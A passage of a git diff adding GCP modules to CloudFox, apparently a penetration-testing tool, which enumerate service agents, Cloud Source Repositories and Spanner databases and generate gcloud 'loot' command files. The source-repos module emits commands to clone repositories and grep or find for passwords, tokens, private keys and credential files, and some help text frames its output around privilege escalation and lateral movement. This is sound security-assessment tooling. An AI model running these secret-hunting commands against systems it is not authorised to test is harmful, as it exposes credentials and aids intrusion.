scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractEmailFromMember extracts the email/identity from an IAM member string +// e.g., "user:alice@example.com" -> "alice@example.com" +// e.g., "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam..." +func extractEmailFromMember(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go new file mode 100644 index 00000000..b7b4788e --- /dev/null +++ b/gcp/commands/serviceagents.go @@ -0,0 +1,402 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + serviceagentsservice "github.com/BishopFox/cloudfox/gcp/services/serviceAgentsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPServiceAgentsCommand = &cobra.Command{ + Use: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Aliases: []string{"agents", "service-accounts-google", "gcp-agents"}, + Short: "Enumerate Google-managed service agents", + Long: `Enumerate Google-managed service agents and their permissions. + +Service agents are Google-managed service accounts that operate on behalf +of GCP services. 
Understanding them helps identify: +- Hidden access paths to resources +- Cross-project service agent access +- Overprivileged service agents +- Potential lateral movement via service agent impersonation + +Common Service Agents: +- Cloud Build Service Account (@cloudbuild.gserviceaccount.com) +- Compute Engine Service Agent (@compute-system.iam.gserviceaccount.com) +- GKE Service Agent (@container-engine-robot.iam.gserviceaccount.com) +- Cloud Run/Functions (@serverless-robot-prod.iam.gserviceaccount.com) +- Cloud SQL Service Agent (@gcp-sa-cloud-sql.iam.gserviceaccount.com) + +Security Considerations: +- Service agents often have broad permissions +- Cross-project agents indicate shared service access +- Cloud Build SA is a common privilege escalation vector +- Default compute SA often has Editor role + +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPServiceAgentsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ServiceAgentsModule struct { + gcpinternal.BaseGCPModule + + ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + OrgCache *gcpinternal.OrgCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ServiceAgentsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ServiceAgentsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ServiceAgentsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, 
globals.GCP_SERVICEAGENTS_MODULE_NAME) + if err != nil { + return + } + + module := &ServiceAgentsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectAgents: make(map[string][]serviceagentsservice.ServiceAgentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) + + allAgents := m.getAllAgents() + if len(allAgents) == 0 { + logger.InfoM("No service agents found", globals.GCP_SERVICEAGENTS_MODULE_NAME) + return + } + + // Count cross-project agents + crossProjectCount := 0 + for _, agent := range allAgents { + if agent.IsCrossProject { + crossProjectCount++ + } + } + + if crossProjectCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s) (%d cross-project)", len(allAgents), crossProjectCount), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service agent(s)", len(allAgents)), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllAgents returns all agents from all projects (for statistics) +func (m *ServiceAgentsModule) getAllAgents() []serviceagentsservice.ServiceAgentInfo { + var all []serviceagentsservice.ServiceAgentInfo + for _, agents := range m.ProjectAgents { + all = append(all, agents...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ServiceAgentsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating service agents in project: %s", projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } + + svc := serviceagentsservice.New() + agents, err := svc.GetServiceAgents(projectID, m.OrgCache) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEAGENTS_MODULE_NAME, + fmt.Sprintf("Could not get service agents in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectAgents[projectID] = agents + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["serviceagents-commands"] = &internal.LootFile{ + Name: "serviceagents-commands", + Contents: "# Service Agents Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, agent := range agents { + m.addAgentToLoot(projectID, agent) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service agent(s) in project %s", len(agents), projectID), globals.GCP_SERVICEAGENTS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ServiceAgentsModule) addAgentToLoot(projectID string, agent serviceagentsservice.ServiceAgentInfo) { + lootFile := m.LootMap[projectID]["serviceagents-commands"] + if lootFile == nil { + return + } + + crossProjectNote := "" + if agent.IsCrossProject { + crossProjectNote = " [CROSS-PROJECT from " + agent.SourceProject + "]" + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + 
"# SERVICE AGENT: %s%s\n"+ + "# =============================================================================\n"+ + "# Email: %s\n"+ + "# Description: %s\n", + agent.ServiceName, crossProjectNote, + agent.Email, agent.Description, + ) + + if agent.IsCrossProject && agent.SourceProject != "" { + lootFile.Contents += fmt.Sprintf("# Source Project: %s\n", agent.SourceProject) + } + + if len(agent.Roles) > 0 { + lootFile.Contents += fmt.Sprintf("# Roles: %s\n", strings.Join(agent.Roles, ", ")) + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# List all roles granted to this service agent (clean output for screenshots) +gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains("%s")) | .role' + +# Show service agent with its roles (formatted for reporting) +gcloud projects get-iam-policy %s --format=json | jq '[.bindings[] | select(.members[] | contains("%s")) | {role: .role, member: "%s"}]' + +# Check what resources this service agent can access (with roles) +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy:%s' --format=json | jq -r '.results[] | {resource: .resource, roles: [.policy.bindings[].role]} | "\(.resource): \(.roles | join(", "))"' + +# Check resource-level IAM bindings for this service agent +gcloud asset search-all-iam-policies --scope=projects/%s --query='policy.bindings.members:%s' --format=json | jq -r '.results[] | "\(.resource): \([.policy.bindings[] | select(.members[] | contains("%s")) | .role] | join(", "))"' + +`, projectID, agent.Email, projectID, agent.Email, agent.Email, projectID, agent.Email, projectID, agent.Email, agent.Email) + + lootFile.Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + 
m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getHeader returns the table header +func (m *ServiceAgentsModule) getHeader() []string { + return []string{ + "Project", + "Service", + "Email", + "Source Project", + "Cross-Project", + "Role", + "Attack Paths", + "Description", + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *ServiceAgentsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, agents := range m.ProjectAgents { + body := m.agentsToTableBody(agents) + tables := []internal.TableFile{{ + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ServiceAgentsOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ServiceAgentsModule) writeFlatOutput(ctx 
context.Context, logger internal.Logger) { + header := m.getHeader() + + allAgents := m.getAllAgents() + body := m.agentsToTableBody(allAgents) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: globals.GCP_SERVICEAGENTS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + output := ServiceAgentsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SERVICEAGENTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// agentsToTableBody converts agents to table rows +func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.ServiceAgentInfo) [][]string { + var body [][]string + for _, agent := range agents { + crossProject := "No" + if agent.IsCrossProject { + crossProject = "Yes" + } + + // Source project (where the agent originates from) + sourceProject := "-" + if agent.SourceProject != "" { + sourceProject = agent.SourceProject + } + + // Check attack paths for this service agent + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, agent.Email) + } + + // One row per role + if len(agent.Roles) > 0 { + for _, role := range agent.Roles { + body = append(body, []string{ + 
m.GetProjectName(agent.ProjectID), + agent.ServiceName, + agent.Email, + sourceProject, + crossProject, + role, + attackPaths, + agent.Description, + }) + } + } else { + // Agent with no roles + body = append(body, []string{ + m.GetProjectName(agent.ProjectID), + agent.ServiceName, + agent.Email, + sourceProject, + crossProject, + "-", + attackPaths, + agent.Description, + }) + } + } + return body +} diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go new file mode 100644 index 00000000..4e7f74d5 --- /dev/null +++ b/gcp/commands/sourcerepos.go @@ -0,0 +1,388 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSourceReposCommand = &cobra.Command{ + Use: globals.GCP_SOURCEREPOS_MODULE_NAME, + Aliases: []string{"repos", "csr", "git"}, + Short: "Enumerate Cloud Source Repositories", + Long: `Enumerate Cloud Source Repositories for code and secrets. 
+ +Cloud Source Repositories can contain: +- Application source code +- Infrastructure as Code (Terraform, CloudFormation) +- Configuration files with hardcoded credentials +- API keys and secrets in code +- CI/CD pipeline configurations + +Output: +- List of all repositories accessible +- Repository sizes and mirror configurations +- Clone commands for each repository +- Secret search commands + +After cloning, search for: +- Hardcoded credentials and API keys +- Private keys and certificates +- Environment configuration files +- Database connection strings`, + Run: runGCPSourceReposCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SourceReposModule struct { + gcpinternal.BaseGCPModule + + ProjectRepos map[string][]sourcereposservice.RepoInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SourceReposOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SourceReposOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SourceReposOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSourceReposCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SOURCEREPOS_MODULE_NAME) + if err != nil { + return + } + + module := &SourceReposModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectRepos: make(map[string][]sourcereposservice.RepoInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SourceReposModule) Execute(ctx context.Context, logger 
internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SOURCEREPOS_MODULE_NAME, m.processProject) + + allRepos := m.getAllRepos() + if len(allRepos) == 0 { + logger.InfoM("No Cloud Source Repositories found", globals.GCP_SOURCEREPOS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies)", len(allRepos)), globals.GCP_SOURCEREPOS_MODULE_NAME) + logger.InfoM("[PENTEST] Clone repositories and search for secrets!", globals.GCP_SOURCEREPOS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllRepos returns all repos from all projects (for statistics) +func (m *SourceReposModule) getAllRepos() []sourcereposservice.RepoInfo { + var all []sourcereposservice.RepoInfo + for _, repos := range m.ProjectRepos { + all = append(all, repos...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SourceReposModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Source Repositories in project: %s", projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } + + svc := sourcereposservice.New() + repos, err := svc.ListRepos(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SOURCEREPOS_MODULE_NAME, + fmt.Sprintf("Could not list repos in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectRepos[projectID] = repos + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["sourcerepos-commands"] = &internal.LootFile{ + Name: "sourcerepos-commands", + Contents: "# Cloud Source Repository Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, repo := range repos { + m.addRepoToLoot(projectID, repo) + } + 
m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) in project %s", len(repos), projectID), globals.GCP_SOURCEREPOS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SourceReposModule) addRepoToLoot(projectID string, repo sourcereposservice.RepoInfo) { + lootFile := m.LootMap[projectID]["sourcerepos-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# REPOSITORY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n", + repo.Name, repo.ProjectID, + ) + + if repo.Size > 0 { + lootFile.Contents += fmt.Sprintf("# Size: %d bytes\n", repo.Size) + } + if repo.MirrorConfig { + lootFile.Contents += fmt.Sprintf("# Mirrors: %s\n", repo.MirrorURL) + } + if repo.PubsubConfigs > 0 { + lootFile.Contents += fmt.Sprintf("# Pub/Sub Triggers: %d\n", repo.PubsubConfigs) + } + + // IAM bindings summary + if len(repo.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range repo.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf( + "\n# Clone repository:\n"+ + "gcloud source repos clone %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud source repos get-iam-policy %s --project=%s\n\n"+ + "# Search for secrets after cloning:\n"+ + "cd %s && grep -rE '(password|secret|api[_-]?key|private[_-]?key|AWS_|GOOGLE_|token)' . --include='*'\n"+ + "find . 
-name '*.pem' -o -name '*.key' -o -name '.env*' -o -name '*credential*' -o -name '*.tfvars'\n"+ + "grep -rE 'BEGIN (RSA |DSA |EC |OPENSSH )?PRIVATE KEY' .\n\n", + repo.Name, repo.ProjectID, + repo.Name, repo.ProjectID, + repo.Name, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SourceReposModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Binding Role", + "IAM Binding Principal", + } + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, repos := range m.ProjectRepos { + body := m.reposToTableBody(repos) + tables := []internal.TableFile{{ + Name: "source-repos", + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SourceReposOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, 
+ m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SourceReposModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project", + "Name", + "Size", + "Mirror", + "Mirror URL", + "Triggers", + "IAM Binding Role", + "IAM Binding Principal", + } + + allRepos := m.getAllRepos() + body := m.reposToTableBody(allRepos) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "source-repos", + Header: header, + Body: body, + }, + } + + output := SourceReposOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SOURCEREPOS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// reposToTableBody converts repos to table rows +func (m *SourceReposModule) reposToTableBody(repos []sourcereposservice.RepoInfo) [][]string { + var body [][]string + for _, repo := range repos { + sizeDisplay := "-" + if repo.Size > 0 { + if repo.Size > 1024*1024 { + sizeDisplay = fmt.Sprintf("%.1f MB", float64(repo.Size)/(1024*1024)) + } else if repo.Size > 1024 { + sizeDisplay = fmt.Sprintf("%.1f KB", 
float64(repo.Size)/1024) + } else { + sizeDisplay = fmt.Sprintf("%d B", repo.Size) + } + } + + mirror := "No" + mirrorURL := "-" + if repo.MirrorConfig { + mirror = "Yes" + mirrorURL = repo.MirrorURL + } + + triggers := "-" + if repo.PubsubConfigs > 0 { + triggers = fmt.Sprintf("%d", repo.PubsubConfigs) + } + + // One row per IAM binding + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + binding.Role, + binding.Member, + }) + } + } else { + // Repo with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repo.Name, + sizeDisplay, + mirror, + mirrorURL, + triggers, + "-", + "-", + }) + } + } + return body +} diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go new file mode 100644 index 00000000..79e9f1c0 --- /dev/null +++ b/gcp/commands/spanner.go @@ -0,0 +1,464 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerCommand = &cobra.Command{ + Use: globals.GCP_SPANNER_MODULE_NAME, + Aliases: []string{"cloud-spanner"}, + Short: "Enumerate Cloud Spanner instances and databases", + Long: `Enumerate Cloud Spanner instances and databases with IAM bindings. 
+ +Features: +- Lists all Spanner instances with configuration details +- Shows databases within each instance with encryption info +- Enumerates IAM bindings at both instance and database levels +- Generates gcloud commands for further analysis`, + Run: runGCPSpannerCommand, +} + +type SpannerModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]spannerservice.SpannerInstanceInfo // projectID -> instances + ProjectDatabases map[string][]spannerservice.SpannerDatabaseInfo // projectID -> databases + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type SpannerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNER_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]spannerservice.SpannerInstanceInfo), + ProjectDatabases: make(map[string][]spannerservice.SpannerDatabaseInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNER_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allDatabases := m.getAllDatabases() + + if len(allInstances) == 0 { + logger.InfoM("No Spanner instances found", globals.GCP_SPANNER_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Spanner instance(s) with %d database(s)", + len(allInstances), len(allDatabases)), globals.GCP_SPANNER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m 
*SpannerModule) getAllInstances() []spannerservice.SpannerInstanceInfo { + var all []spannerservice.SpannerInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *SpannerModule) getAllDatabases() []spannerservice.SpannerDatabaseInfo { + var all []spannerservice.SpannerDatabaseInfo + for _, databases := range m.ProjectDatabases { + all = append(all, databases...) + } + return all +} + +func (m *SpannerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Spanner in project: %s", projectID), globals.GCP_SPANNER_MODULE_NAME) + } + + svc := spannerservice.New() + result, err := svc.ListInstancesAndDatabases(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, + fmt.Sprintf("Could not list Spanner instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = result.Instances + m.ProjectDatabases[projectID] = result.Databases + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["spanner-commands"] = &internal.LootFile{ + Name: "spanner-commands", + Contents: "# Spanner Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range result.Instances { + m.addInstanceToLoot(projectID, instance) + } + for _, database := range result.Databases { + m.addDatabaseToLoot(projectID, database) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) and %d database(s) in project %s", + len(result.Instances), len(result.Databases), projectID), globals.GCP_SPANNER_MODULE_NAME) + } +} + +func (m *SpannerModule) 
addInstanceToLoot(projectID string, instance spannerservice.SpannerInstanceInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# Config: %s\n"+ + "# Nodes: %d\n"+ + "# State: %s\n", + instance.Name, instance.ProjectID, + instance.DisplayName, instance.Config, + instance.NodeCount, instance.State, + ) + + if len(instance.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range instance.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud spanner instances describe %s --project=%s\n\n"+ + "# List databases:\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud spanner instances get-iam-policy %s --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) +} + +func (m *SpannerModule) addDatabaseToLoot(projectID string, database spannerservice.SpannerDatabaseInfo) { + lootFile := m.LootMap[projectID]["spanner-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# DATABASE: %s (Instance: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# State: %s\n"+ + "# Encryption: %s\n", + database.Name, database.InstanceName, + database.ProjectID, database.State, + database.EncryptionType, + ) + + if database.KmsKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", 
database.KmsKeyName) + } + + if len(database.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range database.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe database: +gcloud spanner databases describe %s --instance=%s --project=%s + +# Get database IAM policy: +gcloud spanner databases get-iam-policy %s --instance=%s --project=%s + +# List all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.TABLES" + +# List all columns for all tables: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT TABLE_NAME, COLUMN_NAME, SPANNER_TYPE FROM INFORMATION_SCHEMA.COLUMNS ORDER BY TABLE_NAME" + +# List indexes: +gcloud spanner databases execute-sql %s --instance=%s --project=%s --sql="SELECT * FROM INFORMATION_SCHEMA.INDEXES" + +# Get DDL (schema dump): +gcloud spanner databases ddl describe %s --instance=%s --project=%s + +`, + database.Name, 